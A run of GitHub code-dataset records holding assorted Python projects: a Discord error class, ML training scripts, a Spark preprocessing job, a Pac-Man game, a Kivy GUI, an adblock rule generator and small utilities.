UNIT: %s'%str(unit))\n for layer in layers:\n print('PROCESSING LAYER: %s'%layer)\n for sparsity in sparsities:\n call_str = 'python force_correlation.py --unit %s --layer %s --sparsity %s --config %s --data-path %s --device %s --out-root %s --batch-size %s --original_act_file %s'%(str(unit),layer,str(sparsity),config_file,data_path,device,out_root,str(batch_size),original_act_file)\n call(call_str,shell=True)\n","repo_name":"chrishamblin7/circuit_explorer","sub_path":"method_comparison/submit_force_correlations.py","file_name":"submit_force_correlations.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73894703235","text":"from typing import Any, Dict, List, Optional, Tuple, Union\n\nfrom aiohttp import ClientResponse\n\n__all__ = (\n \"DisCatPyException\",\n \"HTTPException\",\n)\n\n\nclass DisCatPyException(Exception):\n \"\"\"Basis for all exceptions in DisCatPy. If you wanted to catch any exception\n thrown by DisCatPy, you would catch this exception.\n \"\"\"\n\n pass\n\n\ndef _shorten_error_dict(d: Dict[str, Any], key: str = \"\") -> Dict[str, str]:\n ret_items: List[Tuple[str, str]] = []\n\n for k, val in d.items():\n new_k = key + \".\" + k if key else k\n\n if isinstance(val, dict):\n try:\n _errors: List[Dict[str, Any]] = val[\"_errors\"]\n except KeyError:\n # recursively go through the dict to find the _errors list\n ret_items.extend(_shorten_error_dict(val, new_k).items())\n else:\n ret_items.append((new_k, \" \".join(x.get(\"message\", \"\") for x in _errors)))\n else:\n ret_items.append((new_k, val))\n\n return dict(ret_items)\n\n\nclass HTTPException(DisCatPyException):\n \"\"\"Represents an error while attempting to connect to the Discord REST API.\n\n Attributes\n ----------\n response: :type:`aiohttp.ClientResponse`\n The response from the attempted REST API request.\n text :type:`str`\n The error text. Might be empty.\n status :type:`int`\n The status of the request.\n code :type:`int`\n The Discord specfic error code of the request.\n \"\"\"\n\n def __init__(self, response: ClientResponse, data: Optional[Union[Dict[str, Any], str]]):\n self.response = response\n self.status = response.status\n self.code: int\n self.text: str\n\n if isinstance(data, dict):\n self.code = data.get(\"code\", 0)\n base = data.get(\"message\", \"\")\n errors = data.get(\"errors\")\n if errors:\n errors = _shorten_error_dict(errors)\n helpful_msg = \"In {0}: {0}\".format(t for t in errors.items())\n self.text = f\"{base}\\n{helpful_msg}\"\n else:\n self.text = base\n else:\n self.text = data or \"\"\n self.code = 0\n\n format = \"{0} {1} (error code: {2}\"\n if self.text:\n format += \": {3}\"\n\n format += \")\"\n\n super().__init__(format.format(response.status, response.reason, self.code, self.text))\n","repo_name":"AstroicyOP/Somecord","sub_path":"somecord/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8632421352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\nimport pandas as pd\nfrom collections import defaultdict\nimport numpy as np\nimport math\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import DotProduct, WhiteKernel, RBF\nfrom sklearn import svm\n\n\n# In[2]:\n\n\nX_test = pd.read_csv('Xtest.txt', sep=' ')\nY_test = pd.read_csv('Ytest.txt', sep=',')\nY_train = pd.read_csv('Ytrain.txt', sep=' ')\nX_train = pd.read_csv('Xtrain.txt', sep=' ')\nX_test = X_test.fillna(0)\nX_train = X_train.fillna(0)\nY_train = Y_train.fillna(0)\nY_train=Y_train.replace('?', 0)\nX_train=X_train.replace('?', 0)\nX_test = X_test.replace('?', 0)\n\n\n# In[3]:\n\n\nY_train = Y_train.drop('Id', 1)\nX_train = X_train.drop('Id', 1)\nX_test = X_test.drop('Id', 1)\n\n\n# In[4]:\n\n\na = DotProduct() + WhiteKernel()\n\n\n# In[5]:\n\n\n\nd = {}\nY_train['Z01']\nfor i in range(1, 15, 1):\n\n d[\"m\" + str(i)] = RandomForestRegressor(n_estimators=100, min_samples_leaf=3, max_features='sqrt',\n n_jobs=-1)\n col = 'Z' + '0' + str(i) if i<10 else 'Z'+ str(i)\n print(col)\n d[\"m\"+str(i)].fit(X_train, Y_train[col])\n\n\n# In[ ]:\n\n\nfor i in range(1, 15, 1):\n col = 'Z' + '0' + str(i) if i<10 else 'Z'+ str(i)\n print(col)\n Y_test[col] = d[\"m\"+str(i)].predict(X_test, return_std=True)\n\n\n# In[ ]:\n\n\nY_test['index'] = Y_test['Id'].str.split(\":\", n = 1, expand = True)[1]\nindexArr = []\nfor index, row in Y_test.iterrows(): \n# print(row[row[\"index\"]])\n indexArr.append(row[row[\"index\"]])\ntmp =np.asarray(indexArr)\nY_test['Value'] = tmp\nY_test['Id'] = Y_test['Id'].str.split(\":\", n = 1, expand = True)[0]\n\n\n# In[ ]:\n\n\nY_test = Y_test[['Id','Value']]\nY_test.to_csv('result.csv',index=False)\n\n","repo_name":"jiaranyu/440-module-2","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19774742973","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty, NumericProperty\nfrom kivy.clock import Clock\nimport threading\nfrom Classes.MosaicCreator import MosaicCreator\n\n\nclass MainWindow(BoxLayout):\n displayed_image_path = StringProperty('')\n progress_bar_value = NumericProperty(0)\n def __init__(self, **kwargs):\n self.image_change_trigger = Clock.create_trigger(self.change_displayed_image_from_thread)\n self.progress_bar_value_trigger = Clock.create_trigger(self.change_progress_bar_value)\n\n super(MainWindow, self).__init__(*kwargs)\n self.mosaic_creator_thread = threading.Thread(target=MosaicCreator, args=(self, '',''), daemon=True)\n\n # Will start creating an mosaic. Collecting paths from the user before entering the thread is necessary.\n def start_mosaic_creator_thread(self):\n if not self.mosaic_creator_thread.is_alive():\n image_path = MosaicCreator.get_user_image_path()\n mosaic_path = MosaicCreator.get_user_mosaic_target_path()\n self.mosaic_creator_thread = threading.Thread(target=MosaicCreator, args=(self, image_path, mosaic_path), daemon=True)\n self.mosaic_creator_thread.start()\n\n # Changes displayed image from another thread.\n def change_displayed_image_from_thread(self, image_path):\n if threading.current_thread() is threading.main_thread():\n self.displayed_image_path = self.new_displayed_image_path\n else:\n self.new_displayed_image_path = image_path\n self.image_change_trigger()\n\n def change_progress_bar_value(self, value):\n if threading.current_thread() is threading.main_thread():\n self.progress_bar_value = self.new_progress_bar_value\n else:\n self.new_progress_bar_value = value\n self.progress_bar_value_trigger()\n\nclass PhotomosaicApp(App):\n def build(self):\n return MainWindow()\n\nif __name__ == \"__main__\":\n PhotomosaicApp().run()\n","repo_name":"Basileus1990/Photomosaic","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19169673274","text":"import sys\nimport os\nimport gzip\nfrom collections import Counter\n\nimport argparse\nimport pyspark\nimport string\nfrom nltk.tokenize import TreebankWordTokenizer\n\ntokenizer = TreebankWordTokenizer()\n\nletter_set = set(string.ascii_uppercase + string.ascii_lowercase)\npunc_set = {\"'\", '-'}\nvalid_set = letter_set | punc_set\n\n\ndef parse_column_file(file_name):\n \"\"\"parse the wet files\n Args:\n file_name (string): a list of file names\n Returns:\n list[list[string]]: a list of documents\n \"\"\"\n\n\ndef val_and_std(token):\n \"\"\"check the validity of a token; standard it if needed\n Args:\n token (string): a token\n Returns:\n string: an standardized token if the token is valid\n otherwise return None\n \"\"\"\n token = token.strip(\"\\\"\\'-\")\n tran_t = token.replace(\"-\", \"\").replace(\"'\", \"\")\n if tran_t.isascii() and tran_t.isalpha():\n return token.lower()\n return None\n\n\ndef count_and_serialize(doc, v2id_bct):\n \"\"\"format a doc\n Args:\n doc (dict[string, int]): a doc\n v2id_bct (dict(string, int)): vocab dictionary\n Returns:\n string: the serialized document\n \"\"\"\n v2id = v2id_bct.value\n return ' '.join([f'{v2id[k]}:{v}' for k, v in doc.items()])\n\n\ndef word_doc_freq_map(doc):\n \"\"\"emit words\n Args:\n doc (list[string]): one document\n Returns:\n zip(string, int): emitted words\n \"\"\"\n words = set(doc)\n return zip(words, [1] * len(words))\n\n\ndef read_and_clean_records(args):\n \"\"\"\n read and clean records from compressed dumps\n Returns:\n a persisted rdd with valid docs\n \"\"\"\n # read wet file names\n # set up for file I/O\n # read wet files\n\n sp_df = spark.read.load(args.input_file,\n format=\"csv\", sep=\"\\t\", inferSchema=\"true\",\n header=\"true\")\n \n docs_rdd_with_st = (sp_df.select(['Top_comment_id', 'Top_comment_text', 'Post_text'])\n .rdd\n .repartition(args.num_executors)\n .map(lambda pld: (pld[0], [val_and_std(t) for t in tokenizer.tokenize(pld[1])]))\n .map(lambda doc: (doc[0], [x for x in doc[1] if x]))\n .filter(lambda doc: len(doc[1]) > 10)\n .persist(pyspark.StorageLevel.DISK_ONLY))\n\n # collect words to keep by their document frequencies\n old_n_docs = docs_rdd_with_st.count()\n high_freq = old_n_docs * 0.9\n words_to_keep = set(docs_rdd_with_st\n .map(lambda x: x[1])\n .flatMap(lambda doc: word_doc_freq_map(doc))\n .reduceByKey(lambda x, y: x + y)\n .map(lambda x: (x[0], x[1]))\n .filter(lambda x:\n args.low_freq_threshold <= x[1] < high_freq)\n .map(lambda x: x[0]).collect())\n # remove stop words\n with open(args.stop_words_file, 'r') as istream:\n stop_words = set()\n for line in istream.readlines():\n stop_words.add(line.strip())\n words_to_keep_bct = sc.broadcast(words_to_keep - stop_words)\n doc_rdd = (docs_rdd_with_st.map(lambda doc: (doc[0],\n [t for t in doc[1]\n if t in words_to_keep_bct.value]))\n .filter(lambda doc: len(doc[1]) > 0)\n .map(lambda doc: (doc[0], ' '.join(doc[1])))\n .persist(pyspark.StorageLevel.DISK_ONLY))\n return doc_rdd\n\n\nif __name__ == \"__main__\":\n # get command line arguments\n parser = argparse.ArgumentParser(description='Arguments for process topic modeling data')\n # model parameters\n parser.add_argument('--input_file', type=str, required=True,\n help=('The path to the dataframe (tsv from data.py).'\n 'e.g. research-out/train/part-00000-c824c2b0-19d6-4eaf-a6f7-efd82e586274-c000.csv'))\n parser.add_argument('--output_file', type=str, required=True,\n help='The path to the output file.')\n parser.add_argument('--low_freq_threshold', type=int, required=False,\n default=10,\n help='the words need to appear in at least such number of docs')\n parser.add_argument('--num_executors', type=int, default=64,\n help='The number of executors')\n parser.add_argument('--stop_words_file', type=str, required=True,\n default='models/english', help=\"path to stopword file\")\n args = parser.parse_args()\n\n # setup SparkContext\n conf = pyspark.SparkConf().setAppName(\"TopicModelingProcessor\")\n sc = pyspark.SparkContext(conf=conf)\n spark = pyspark.sql.SparkSession(sc)\n\n doc_rdd = read_and_clean_records(args)\n (doc_rdd.toDF(['Top_comment_id', 'text_for_topic_modeling'])\n .repartition(1)\n .write.csv(args.output_file, header=True, sep='\\t'))\n # close SparkContext\n sc.stop()\n","repo_name":"davidjurgens/prosocial-conversation-forecasting","sub_path":"src/features/tpcdata.py","file_name":"tpcdata.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"5070514342","text":"import pygame.sprite\n\nfrom src.settings import *\nfrom src.classes.background import Background\nfrom src.classes.sound import Sound\nfrom src.classes.table import Table\nfrom src.classes.grid import Grid\nfrom src.classes.field import Field\nfrom src.classes.pacman import Pacman\nfrom src.classes.enemy import Enemy\nfrom src.classes.dot import Dot\nfrom src.classes.dot_flashing import DotFlashing\nfrom src.classes.bonus import Bonus\n\n\n# ======================================================================== create Sprite groups\n\npacman_group = pygame.sprite.GroupSingle()\nenemy_group = pygame.sprite.Group()\nfield_group = pygame.sprite.GroupSingle()\ndot_group = pygame.sprite.Group()\ndot_flashing_group = pygame.sprite.Group()\nbonus_group = pygame.sprite.GroupSingle()\n\n# # add to all_sprite_groups\nall_spite_groups_dict = {'pacman' : pacman_group, 'enemy': enemy_group, 'field' : field_group , 'dot': dot_group,\n 'dot_flashing' : dot_flashing_group, 'bonus': bonus_group,\n }\n\n# # ======================================================================= initialize Classes\n#\npacman = Pacman(all_spite_groups_dict)\n\n# # add to group\n\npacman_group.add(pacman)\n\n\n# create new enemies\ndef enemy_creator():\n picture_enemy_color_type = f'src/assets/images/enemies/{randint(1, 7)}.png'\n enemy = Enemy(all_spite_groups_dict, pacman, picture_enemy_color_type)\n enemy_group.add(enemy)\n\n# create dots and flashing dots and add to groups\ndef food_creator():\n for rows, cols in Dot.food_cells.items():\n for col_index in range(len(cols)):\n if cols[col_index] == '0' or cols[col_index] == '2':\n row = (col_index + 1) * BLOCK_SIZE - 15\n col = rows * BLOCK_SIZE - 15\n if cols[col_index] == '2': # add flashing Dot\n dot_flash = DotFlashing(row, col)\n dot_flashing_group.add(dot_flash)\n else:\n dot = Dot(row, col)\n dot_group.add(dot)\n\n# ==================================================================\ntable = Table(all_spite_groups_dict, pacman)\n\n# Game State\nclass GameState(Sound):\n COOLDOWN = 1000 # milliseconds\n start_timer = pygame.time.get_ticks()\n\n def __init__(self,):\n self.state = 'intro'\n self.background_picture = None\n self.start_game_counter = 3\n self.is_music_play = False\n self.is_start_game = False\n self.is_created_enemy = False\n self.is_created_bonus = False\n self.is_game_over = False\n self.reset_current_game_data = False\n self.reset_all_data_for_new_game = False\n\n def game(self):\n\n # ----------------------------- NEW GAME reset all data\n if self.reset_all_data_for_new_game:\n self.background_picture = None\n self.is_music_play = False\n self.start_game_counter = 3\n self.is_start_game = False\n self.is_created_enemy = False\n self.is_created_bonus = False\n self.is_game_over = False\n self.reset_current_game_data = False\n [all_spite_groups_dict[group].empty() for group in all_spite_groups_dict]\n pacman_group.add(pacman)\n pacman.reset_all_data()\n self.reset_all_data_for_new_game = False\n\n\n # ---------------------------- if level complete\n if pacman.is_level_complete:\n pygame.time.delay(3000)\n self.reset_current_game_data = True\n self.state = 'get_ready'\n\n # ---------------------------- pacman death replay level\n if pacman.is_level_restart:\n self.reset_current_game_data = True\n self.state = 'get_ready'\n\n # ----------------------------- Reset current data\n if self.reset_current_game_data:\n self.background_picture = None\n self.is_music_play = False\n self.start_game_counter = 3\n self.is_start_game = False\n self.is_game_over = False\n self.is_created_bonus = False\n enemy_group.empty()\n pacman_group.empty()\n pacman_group.add(pacman)\n pacman.reset_current_data()\n bonus_group.empty()\n\n # ----------------------------- start game\n if not self.is_start_game:\n Sound.stop_all_sounds()\n Sound.pacman_start(self)\n Sound.game_music(self)\n self.reset_current_game_data = False\n self.is_start_game = True\n\n # ------- add field\n if pacman.level < 9:\n level = pacman.level\n else:\n level = 9\n field = Field(f'./src/assets/images/game_fields/{level}.png')\n field_group.add(field)\n\n # ------ add dots\n if not len(dot_group):\n food_creator() # --- add dots\n\n # ------------- generate enemies\n if not self.is_created_enemy: # not\n time_now = pygame.time.get_ticks()\n if time_now - self.start_timer > self.COOLDOWN + 1000:\n self.start_timer = time_now\n if len(enemy_group) < 14 + pacman.level:\n enemy_creator()\n\n # ------------- generate bonus fruit\n if not self.is_created_bonus:\n if len(dot_group) == 100:\n fruit_num = pacman.level - 1\n if fruit_num > 9:\n fruit_num = randint(0, 9)\n bonus_group.add(Bonus(fruit_num))\n Sound.add_bonus_fruit(self)\n self.is_created_bonus = True\n\n if pacman.is_pause:\n pacman.is_pause = False\n self.state = 'pause'\n\n if pacman.is_game_over:\n Sound.stop_all_sounds()\n Sound.game_over_music(self)\n self.state = 'game_over'\n # # =================================================== UPDATE\n # Grid.draw_grid(self)\n table.update()\n\n # # --------------------------- draw sprite group\n field_group.draw(SCREEN)\n dot_group.draw(SCREEN)\n dot_flashing_group.draw(SCREEN)\n pacman_group.draw(SCREEN)\n enemy_group.draw(SCREEN)\n bonus_group.draw(SCREEN)\n\n # # --------------------------- update sprite group\n pacman_group.update()\n enemy_group.update()\n # dot_group.update()\n dot_flashing_group.update()\n\n def intro(self):\n if not self.is_music_play:\n Sound.intro_music(self)\n self.is_music_play = True\n font = './src/fonts/aAblasco.ttf'\n background_image('./src/assets/images/backgrounds/bg_intro.png')\n text_creator('Crazy PacMan', 'gold2', 60, 100, 70, None, './src/fonts/cute.ttf')\n text_creator('Menu - M', 'red', S_W - 230, S_H - 160, 30, None, font)\n text_creator('Credits - C', 'fuchsia', S_W - 230, S_H - 110, 30, None, font)\n text_creator('Start game - SPACE', 'deepskyblue', S_W // 3 - 6, S_H - 24, 32, None, font)\n text_creator('By Abaddon', 'orange', 10, S_H - 10, 15, None, font)\n text_creator('Copyright 2023', 'white', S_W - 125, S_H - 10, 15, None, font)\n\n if check_key_pressed(pygame.K_SPACE):\n Sound.btn_click(self)\n self.start_game_counter = 3\n Sound.stop_all_sounds()\n self.state = 'get_ready'\n if check_key_pressed(pygame.K_c):\n Sound.btn_click(self)\n self.state = 'credits'\n if check_key_pressed(pygame.K_m):\n Sound.btn_click(self)\n self.state = 'menu'\n exit_game()\n\n def menu(self):\n background_image('./src/assets/images/backgrounds/bg_menu.png')\n text_creator('Press RETURN to back...', 'bisque', S_W - 230, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n if check_key_pressed(pygame.K_RETURN):\n self.state = 'intro'\n exit_game()\n\n def credits(self):\n font = None\n size = 16\n # background_image('./src/assets/images/backgrounds/bg_EMPTY.png')\n text_creator('CREDITS', 'slateblue3', S_W // 2 - 100, 40, 50, None, './src/fonts/aAblasco.ttf', True)\n text_creator('version: 1.0.0-beta', 'cornsilk', S_W - 160, 20, 16, None, './src/fonts/aAblasco.ttf')\n\n text_creator('Free images:', 'brown', 110, 100, 35, None, font)\n text_creator('https://www.pngwing.com', 'cadetblue4', 130, 125, 30, None, font)\n\n text_creator('Free sounds:', 'brown', 110, 200, 35, None, font)\n text_creator('https://freesound.org/', 'cadetblue4', 130, 225, 30, None, font)\n\n text_creator('Platform 2D game:', 'brown', 110, S_H // 2, 34, None, font)\n text_creator('https://www.pygame.org', 'cadetblue4', 130, S_H // 2 + 24, 30, None, font)\n\n SCREEN.blit(pygame.image.load('./src/assets/images/title/pygame_logo.png'), (S_W // 4 - 50, S_H - 266))\n\n text_creator('Developer:', 'brown', 30, S_H - 60, 30, None, font)\n text_creator('by Abaddon', 'cadetblue4', 50, S_H - 40, 30, None, font)\n\n text_creator('Bug rapports:', 'brown', S_W // 2 - 90, S_H - 60, 30, None, font)\n text_creator('subtotal@abv.bg', 'cadetblue4', S_W // 2 - 70, S_H - 40, 30, None, font)\n\n text_creator('Copyright:', 'brown', S_W - 140, S_H - 60, 30, None, font)\n text_creator('© 2023', 'cadetblue4', S_W - 120, S_H - 40, 30, None, font)\n\n text_creator('Press RETURN to back...', 'bisque', S_W - 230, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if check_key_pressed(pygame.K_RETURN):\n Sound.btn_click(self)\n self.state = 'intro'\n exit_game()\n\n def get_ready(self):\n Sound.stop_all_sounds()\n time_now = pygame.time.get_ticks()\n if time_now - self.start_timer > self.COOLDOWN:\n self.start_game_counter -= 1\n self.start_timer = time_now\n font = './src/fonts/aAblasco.ttf'\n background_image('./src/assets/images/backgrounds/bg_poster.png')\n text_creator('By Abaddon', 'orange', 10, S_H - 10, 15, None, font)\n text_creator('Copyright 2023', 'white', S_W - 125, S_H - 10, 15, None, font)\n text_creator(f'START AFTER: {self.start_game_counter}', 'purple', 215, S_H - 40, 40, None, './src/fonts/cute.ttf')\n\n if self.start_game_counter == 0:\n Sound.pacman_start(self)\n Sound.game_music(self)\n self.state = 'game'\n\n def start_pause(self):\n background_image('./src/assets/images/backgrounds/bg_pause.png')\n text_creator('PAUSE', 'red3', S_W // 2 + 60, S_H // 2 - 30, 80, None, './src/fonts/cute.ttf')\n text_creator('Press RETURN to continue...', 'bisque', S_W - 255, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if key_pressed(pygame.K_RETURN):\n self.state = 'game'\n\n def game_over(self):\n background_image('./src/assets/images/backgrounds/bg_game_over2.png', 4)\n text_creator('GAME OVER', 'red', S_W // 2 - 25, S_H // 2 - 150, 54, None, './src/fonts/cute.ttf')\n text_creator('Press RETURN to back...', 'bisque', S_W - 240, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if key_pressed(pygame.K_RETURN):\n Sound.stop_all_sounds()\n Sound.intro_music(self)\n self.reset_all_data_for_new_game = True\n self.state = 'intro'\n exit_game()\n\n # ========================================= state manager ...\n def state_manager(self):\n # print(self.state)\n if self.state == 'intro':\n self.intro()\n if self.state == 'game':\n self.game()\n if self.state == 'get_ready':\n self.get_ready()\n if self.state == 'menu':\n self.menu()\n if self.state == 'credits':\n self.credits()\n if self.state == 'pause':\n self.start_pause()\n if self.state == 'game_over':\n self.game_over()\n\n\n\n# ================================ create new GameState\ngame_state = GameState()\n\n\n# ============= Starting Game loop\nwhile True:\n SCREEN.fill(pygame.Color('black'))\n game_state.state_manager()\n pygame.display.update()\n CLOCK.tick(FPS)\n exit_game()\n","repo_name":"byAbaddon/PyGame-Crazy_Pacman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8821181463","text":"import sys\r\nfrom tkinter import *\r\nfrom tkinter import ttk, messagebox\r\nimport os.path\r\n\r\n# Main Window\r\nmywin = Tk()\r\nmywin.title(\"AdBlock Generator v0.1\")\r\nmywin.geometry(\"339x160\")\r\nmywin.eval('tk::PlaceWindow . center')\r\nmywin.resizable(False, False)\r\nmywin.attributes(\"-alpha\", 0.91)\r\nicon = os.path.join(sys.path[0], \"pyicon.ico\")\r\nmywin.iconbitmap(icon)\r\n\r\n\r\ndef about():\r\n messagebox.showinfo(\"About\", \"Created by 6l4br10n!\")\r\n\r\n\r\ndef info():\r\n messagebox.showinfo(\"Information\", \"Success!\")\r\n\r\n\r\ndef generate():\r\n the_first_part = \"@@||\"\r\n the_second_part = \"^$generichide\"\r\n the_tird_part = \"##script:inject(bab-defuser.js)\"\r\n\r\n theSite = siteEingabe.get()\r\n generated_code.insert(INSERT, the_first_part + theSite + the_second_part + '\\n')\r\n generated_code.insert(INSERT, theSite + the_tird_part)\r\n button1['state'] = 'disabled'\r\n\r\n\r\ndef copy_code():\r\n generated_code1 = generated_code.get(\"1.0\", 'end-1c')\r\n mywin.clipboard_clear()\r\n mywin.clipboard_append(generated_code1)\r\n button2['state'] = 'disabled'\r\n\r\n\r\n# Menu\r\nmenubar = Menu(mywin)\r\nmywin.config(menu=menubar)\r\n# Undermenu\r\nfile_menu = Menu(menubar, tearoff=0)\r\nfile_menu.add_command(label=\"Exit\", command=mywin.destroy)\r\n\r\nhelp_menu = Menu(menubar, tearoff=0)\r\nhelp_menu.add_command(label=\"About\", command=about)\r\n# Hauptmenu\r\nmenubar.add_cascade(label=\"File\", menu=file_menu)\r\nmenubar.add_cascade(label=\"Help\", menu=help_menu)\r\n\r\n# Labels \r\ninputLabel = ttk.Label(mywin, text=\"Website:\", anchor=\"w\")\r\ninputLabel.place(x=10, y=11, width=200)\r\n\r\n# TextBoxes\r\nsiteEingabe = ttk.Entry(mywin)\r\nsiteEingabe.place(x=70, y=12, width=125)\r\n\r\ngenerated_code = Text(mywin)\r\ngenerated_code.place(x=10, y=45, height=80, width=320)\r\n\r\n# Buttons\r\nbutton1 = ttk.Button(mywin, text=\"Generate\", command=generate)\r\nbutton1.place(x=200, y=10, width=70)\r\nbutton1.bind(\"\")\r\n\r\nbutton2 = ttk.Button(mywin, text=\"Copy\", command=copy_code)\r\nbutton2.place(x=270, y=10, width=60)\r\nbutton2.bind(\"\")\r\n\r\nmywin.mainloop()\r\n","repo_name":"georgimuhov/py","sub_path":"AdBlockGen.py","file_name":"AdBlockGen.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500510396","text":"import os\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n\ndef AllFiles(DirPath, ext):\n targetList = list()\n for root, dirs, files in os.walk(DirPath):\n for f in files:\n if f[-len(ext):].lower() == ext:\n targetList.append(os.path.join(root, f))\n return targetList\n\n\ndef PreprocessData(PathList, img_size, data_gen=2, mode='train'):\n num_data = len(PathList) + data_gen * len(PathList)\n x_data = np.empty((num_data, img_size, img_size, 3))\n y_data = np.empty(num_data)\n\n generator = tf.keras.preprocessing.image.ImageDataGenerator(\n rotation_range=15,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rescale=1. / 255,\n fill_mode='nearest'\n )\n\n for i, path in enumerate(PathList):\n img = cv2.imread(path)\n img = cv2.resize(img, (img_size, img_size))\n img = tf.keras.applications.efficientnet.preprocess_input(img) # using Efficient model\n x_data[i + data_gen * i] = img\n\n if mode == 'train':\n filename = path.split('\\\\')[-1]\n label = filename.split('_')\n label = category.index(label[1]) if len(label) > 1 else 0\n y_data[i + data_gen * i] = label\n\n if data_gen > 0:\n img = img.reshape(1, IMG_SIZE, IMG_SIZE, 3)\n\n batchs = generator.flow(\n img, batch_size=20\n )\n\n for k, aug in enumerate(batchs):\n if k == data_gen:\n break\n\n augImage = aug[0]\n augImage = tf.keras.applications.efficientnet.preprocess_input(augImage)\n x_data[i + (data_gen * i) + k] = augImage\n y_data[i + (data_gen * i) + k] = label\n\n # one-hot encoding\n if mode == 'train':\n y_data = tf.keras.utils.to_categorical(y_data, num_classes=num_classes)\n return x_data, y_data\n else:\n return x_data\n\n\ntrainDir = \".\\\\pneumonia\\\\train\\\\\"\ntestDir = \".\\\\pneumonia\\\\test\\\\\"\n\ntrainDatasets = AllFiles(trainDir, 'jpeg')\ntestDatasets = AllFiles(testDir, 'jpeg')\nx_trainPath, x_valPath = train_test_split(trainDatasets, test_size=0.2)\n\ncategory = ['normal', 'bacteria', 'virus']\n\n# Data Parameters\nnum_classes = 3\nIMG_SIZE = 200\n\nx_train, y_train = PreprocessData(x_trainPath, IMG_SIZE, data_gen=2)\nx_val, y_val = PreprocessData(x_valPath, IMG_SIZE, data_gen=0)\nx_test = PreprocessData(testDatasets, IMG_SIZE, data_gen=0, mode='test')\n# print(x_train.shape, y_train.shape)\n\n# create model\ntf.keras.backend.clear_session()\n\nbase_model = tf.keras.applications.EfficientNetB2(\n include_top=False,\n weights='imagenet',\n input_shape=(IMG_SIZE, IMG_SIZE, 3)\n)\n\n\nx = base_model.output\nx = tf.keras.layers.GlobalAveragePooling2D()(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(256, activation=tf.nn.relu)(x)\nx = tf.keras.layers.Dropout(0.3)(x)\npredictions = tf.keras.layers.Dense(3, activation=tf.nn.softmax)(x)\nmodel = tf.keras.models.Model(base_model.input, predictions)\nmodel.summary()\n\nmodel.compile(\n optimizer='adam',\n loss=tf.keras.losses.categorical_crossentropy,\n metrics=[tf.keras.metrics.categorical_accuracy]\n)\n\nlogs = model.fit(\n x_train, y_train,\n batch_size=32,\n epochs=20,\n validation_data=(x_val, y_val)\n)\n\n# predictions = np.argmax(model.predict(x_test), axis=-1)\n# df = pd.DataFrame()\n# df['Id'] = [f'{i:05d}.jpeg' for i in range(len(x_test))]\n# df['Category'] = predictions.astype(int)\n# df.to_csv('submission.csv', index=False)\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/DeepLearning/tensorflow practice/Handle_Pneumonia.py","file_name":"Handle_Pneumonia.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1349639212","text":"from reportlab.lib.pagesizes import A4\nfrom reportlab.pdfgen.canvas import Canvas\nfrom reportlab.lib.utils import ImageReader\nimport os\n\nlocal = os.getcwd()\naddr = os.path.join(local, 'img')\ncontent = os.listdir(addr)\nfile_list = [arq for arq in content if os.path.isfile(os.path.join(addr,arq))]\n\ncanvas = Canvas('output.pdf', pagesize=A4)\nfor f in file_list:\n canvas.drawImage(os.path.join(addr, f), 10, 10, mask='auto')\n canvas.showPage()\nif len(file_list) > 0:\n canvas.save()\n\n\n","repo_name":"marcoribeirojr/converter-img-to-pdf","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17205163581","text":"import tensorflow as tf\nimport numpy as np\nimport gym\nimport random\nfrom collections import deque\n\n\n\"\"\"\n https://tf.wiki/zh/basic/models.html\n DQN 平衡锤\n\"\"\"\n\nenv = gym.make('CartPole-v1')\nstate = env.reset()\nprint(env.action_space.sample())\nprint(state)\n\n\n# while True:\n# env.render()\n# action = model.predict(state)\n# next_state, reward, done, info = env.step(action)\n# if done:\n# break\n\n\nnum_episodes = 50000 # 